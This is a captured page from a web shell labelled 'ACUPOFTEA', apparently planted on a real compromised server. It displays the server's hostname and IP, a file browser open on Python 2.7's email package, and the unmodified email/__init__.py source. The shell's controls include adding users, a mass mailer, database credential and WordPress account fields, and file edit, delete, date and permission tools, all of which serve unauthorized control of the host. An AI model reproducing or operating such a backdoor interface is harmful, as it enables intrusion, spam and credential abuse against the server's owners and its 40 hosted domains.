System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
lib64
/
python2.7
/
email
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
__init__.py
# Copyright (C) 2001-2006 Python Software Foundation # Author: Barry Warsaw # Contact: email-sig@python.org """A package for parsing, handling, and generating email messages.""" __version__ = '4.0.3' __all__ = [ # Old names 'base64MIME', 'Charset', 'Encoders', 'Errors', 'Generator', 'Header', 'Iterators', 'Message', 'MIMEAudio', 'MIMEBase', 'MIMEImage', 'MIMEMessage', 'MIMEMultipart', 'MIMENonMultipart', 'MIMEText', 'Parser', 'quopriMIME', 'Utils', 'message_from_string', 'message_from_file', # new names 'base64mime', 'charset', 'encoders', 'errors', 'generator', 'header', 'iterators', 'message', 'mime', 'parser', 'quoprimime', 'utils', ] # Some convenience routines. Don't import Parser and Message as side-effects # of importing email since those cascadingly import most of the rest of the # email package. def message_from_string(s, *args, **kws): """Parse a string into a Message object model. Optional _class and strict are passed to the Parser constructor. """ from email.parser import Parser return Parser(*args, **kws).parsestr(s) def message_from_file(fp, *args, **kws): """Read a file and parse its contents into a Message object model. Optional _class and strict are passed to the Parser constructor. """ from email.parser import Parser return Parser(*args, **kws).parse(fp) # Lazy loading to provide name mapping from new-style names (PEP 8 compatible # email 4.0 module names), to old-style names (email 3.0 module names). import sys class LazyImporter(object): def __init__(self, module_name): self.__name__ = 'email.' + module_name def __getattr__(self, name): __import__(self.__name__) mod = sys.modules[self.__name__] self.__dict__.update(mod.__dict__) return getattr(mod, name) _LOWERNAMES = [ # email.<old name> -> email.<new name is lowercased old name> 'Charset', 'Encoders', 'Errors', 'FeedParser', 'Generator', 'Header', 'Iterators', 'Message', 'Parser', 'Utils', 'base64MIME', 'quopriMIME', ] _MIMENAMES = [ # email.MIME<old name> -> email.mime.<new name is lowercased old name> 'Audio', 'Base', 'Image', 'Message', 'Multipart', 'NonMultipart', 'Text', ] for _name in _LOWERNAMES: importer = LazyImporter(_name.lower()) sys.modules['email.' + _name] = importer setattr(sys.modules['email'], _name, importer) import email.mime for _name in _MIMENAMES: importer = LazyImporter('mime.' + _name.lower()) sys.modules['email.MIME' + _name] = importer setattr(sys.modules['email'], 'MIME' + _name, importer) setattr(sys.modules['email.mime'], _name, importer)
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2024-06-24 12:45:06
..
DIR
-
drwxr-xr-x
2024-06-24 12:45:06
mime
DIR
-
drwxr-xr-x
2024-06-24 12:45:06
__init__.py
text/x-python
2.79 KB
-rw-r--r--
2024-04-10 04:58:35
__init__.pyc
application/octet-stream
2.8 KB
-rw-r--r--
2024-04-10 04:58:46
__init__.pyo
application/octet-stream
2.8 KB
-rw-r--r--
2024-04-10 04:58:46
_parseaddr.py
text/x-python
15.76 KB
-rw-r--r--
2024-04-10 04:58:35
_parseaddr.pyc
application/octet-stream
13.57 KB
-rw-r--r--
2024-04-10 04:58:46
_parseaddr.pyo
application/octet-stream
13.57 KB
-rw-r--r--
2024-04-10 04:58:46
base64mime.py
text/x-python
5.66 KB
-rw-r--r--
2024-04-10 04:58:35
base64mime.pyc
application/octet-stream
5.2 KB
-rw-r--r--
2024-04-10 04:58:46
base64mime.pyo
application/octet-stream
5.2 KB
-rw-r--r--
2024-04-10 04:58:46
charset.py
text/x-python
15.67 KB
-rw-r--r--
2024-04-10 04:58:35
charset.pyc
application/octet-stream
13.22 KB
-rw-r--r--
2024-04-10 04:58:46
charset.pyo
application/octet-stream
13.18 KB
-rw-r--r--
2024-04-10 04:58:43
encoders.py
text/x-python
1.97 KB
-rw-r--r--
2024-04-10 04:58:35
encoders.pyc
application/octet-stream
2.18 KB
-rw-r--r--
2024-04-10 04:58:46
encoders.pyo
application/octet-stream
2.18 KB
-rw-r--r--
2024-04-10 04:58:46
errors.py
text/x-python
1.59 KB
-rw-r--r--
2024-04-10 04:58:35
errors.pyc
application/octet-stream
3.45 KB
-rw-r--r--
2024-04-10 04:58:46
errors.pyo
application/octet-stream
3.45 KB
-rw-r--r--
2024-04-10 04:58:46
feedparser.py
text/x-python
20.01 KB
-rw-r--r--
2024-04-10 04:58:35
feedparser.pyc
application/octet-stream
10.88 KB
-rw-r--r--
2024-04-10 04:58:46
feedparser.pyo
application/octet-stream
10.79 KB
-rw-r--r--
2024-04-10 04:58:43
generator.py
text/x-python
13.87 KB
-rw-r--r--
2024-04-10 04:58:35
generator.pyc
application/octet-stream
10.14 KB
-rw-r--r--
2024-04-10 04:58:46
generator.pyo
application/octet-stream
10.14 KB
-rw-r--r--
2024-04-10 04:58:46
header.py
text/x-python
21.72 KB
-rw-r--r--
2024-04-10 04:58:35
header.pyc
application/octet-stream
13.34 KB
-rw-r--r--
2024-04-10 04:58:46
header.pyo
application/octet-stream
13.27 KB
-rw-r--r--
2024-04-10 04:58:43
iterators.py
text/x-python
2.15 KB
-rw-r--r--
2024-04-10 04:58:35
iterators.pyc
application/octet-stream
2.31 KB
-rw-r--r--
2024-04-10 04:58:46
iterators.pyo
application/octet-stream
2.31 KB
-rw-r--r--
2024-04-10 04:58:46
message.py
text/x-python
30 KB
-rw-r--r--
2024-04-10 04:58:35
message.pyc
application/octet-stream
28 KB
-rw-r--r--
2024-04-10 04:58:46
message.pyo
application/octet-stream
28 KB
-rw-r--r--
2024-04-10 04:58:46
parser.py
text/x-python
3.22 KB
-rw-r--r--
2024-04-10 04:58:35
parser.pyc
application/octet-stream
3.74 KB
-rw-r--r--
2024-04-10 04:58:46
parser.pyo
application/octet-stream
3.74 KB
-rw-r--r--
2024-04-10 04:58:46
quoprimime.py
text/x-python
10.59 KB
-rw-r--r--
2024-04-10 04:58:35
quoprimime.pyc
application/octet-stream
8.64 KB
-rw-r--r--
2024-04-10 04:58:46
quoprimime.pyo
application/octet-stream
8.64 KB
-rw-r--r--
2024-04-10 04:58:46
utils.py
text/x-python
9.79 KB
-rw-r--r--
2024-04-10 04:58:35
utils.pyc
application/octet-stream
9.11 KB
-rw-r--r--
2024-04-10 04:58:46
utils.pyo
application/octet-stream
9.11 KB
-rw-r--r--
2024-04-10 04:58:46
~ ACUPOFTEA - mail.ontime-ae.com